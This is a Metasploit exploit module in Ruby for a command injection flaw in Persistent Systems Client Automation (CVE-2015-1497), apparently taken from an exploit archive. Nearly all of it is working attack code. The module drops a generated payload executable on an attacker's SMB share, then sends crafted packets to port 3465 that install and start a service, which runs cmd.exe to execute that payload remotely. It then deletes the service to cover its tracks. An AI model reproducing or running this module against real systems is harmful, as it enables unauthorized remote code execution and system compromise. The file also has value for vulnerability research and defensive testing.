Persistent Systems Client Automation Command Injection RCE

[Kalashnikov.]

# Exploit Title: Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability
# Date: 2014-10-01
# Exploit Author: Ben Turner
# Vendor Homepage: Previosuly HP, now http://www.persistentsys.com/
# Version: 7.9, 8.1, 9.0, 9.1
# Tested on: Windows XP, Windows 7, Server 2003 and Server 2008
# CVE-2015-1497
# CVSS: 10

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    # Exploit mixins should be called first
    include Msf::Exploit::Remote::SMB
    include Msf::Exploit::EXE  
    include Msf::Auxiliary::Report

    # Aliases for common classes
    SIMPLE = Rex::Proto::SMB::Client
    XCEPT  = Rex::Proto::SMB::Exceptions
    CONST  = Rex::Proto::SMB::Constants


    def initialize
        super(
            'Name'        => 'Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability',
            'Description' => %Q{
                This module exploits PS Client Automation, by sending a remote service install and creating a callback payload. 
            },
            'Author'         => [ 'Ben Turner' ],
            'License'        => BSD_LICENSE,
            'References'  =>
                [
                ],
            'Privileged'     => true,
            'DefaultOptions' =>
                {
                    'WfsDelay'     => 10,
                    'EXITFUNC' => 'process'
                },
            'Payload'     => { 'BadChars' => '', 'DisableNops' => true },
            'Platform'    => ['win'],
            'Targets'         =>
                [
                    [ 'PS Client Automation on Windows XP, 7, Server 2003 & 2008', {}]
                ],
            'DefaultTarget'   => 0,
            'DisclosureDate' => 'January 10 2014'
        )

        register_options([
            OptString.new('SMBServer', [true, 'The IP address of the SMB server', '192.168.1.1']),
            OptString.new('SMBShare', [true, 'The root directory that is shared', 'share']),
            Opt::RPORT(3465),
        ], self.class)

    end

    def exploit

        createservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
        createservice << "Nvdkit.exe service install test -path \"c:\\windows\\system32\\cmd.exe /c \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe\""
        createservice << "\x22\x00\x00\x00"

                startservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
                startservice << "Nvdkit service start test"
                startservice << "\x22\x00\x00\x00"

        removeservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
        removeservice << "Nvdkit service remove test"
        removeservice << "\x22\x00\x00\x00"

        def filedrop()
            begin
                origrport = self.datastore['RPORT']
                self.datastore['RPORT'] = 445
                origrhost = self.datastore['RHOST']
                self.datastore['RHOST'] = self.datastore['SMBServer']
                connect()
                smb_login()
                print_status("Generating payload, dropping here: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe'...")
                self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
                exe = generate_payload_exe
                fd = smb_open("\\installservice.exe", 'rwct')
                fd << exe
                fd.close

                self.datastore['RPORT'] = origrport
                self.datastore['RHOST'] = origrhost

            rescue Rex::Proto::SMB::Exceptions::Error => e
                print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n")  
                abort()
            end
        end

        def filetest()
            begin
                origrport = self.datastore['RPORT']
                self.datastore['RPORT'] = 445
                origrhost = self.datastore['RHOST']
                self.datastore['RHOST'] = self.datastore['SMBServer']
                connect()
                smb_login()
                print_status("Checking the remote share: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
                self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
                file = "\\installservice.exe"
                filetest = smb_file_exist?(file)
                if filetest
                    print_good("Found, upload was succesful! \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\#{file}\n")
                else
                    print_error("\\\\#{datastore['SMBServer']}\\#{file} - The file does not exist, try again!")

                end

                self.datastore['RPORT'] = origrport
                self.datastore['RHOST'] = origrhost

            rescue Rex::Proto::SMB::Exceptions::Error => e
                print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n")  
                abort()
            end
        end

        begin
            filedrop()
            filetest()
            connect()
            sock.put(createservice)
            print_status("Creating the callback payload and installing the remote service")
            disconnect
            sleep(5)
            connect()
            sock.put(startservice)
                        print_good("Exploit sent, awaiting response from service. Waiting 15 seconds before removing the service")
            disconnect
            sleep(30)
            connect
            sock.put(removeservice)
            disconnect

        rescue ::Exception => e
            print_error("Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}\n\n") 
            abort()

        end
    end
end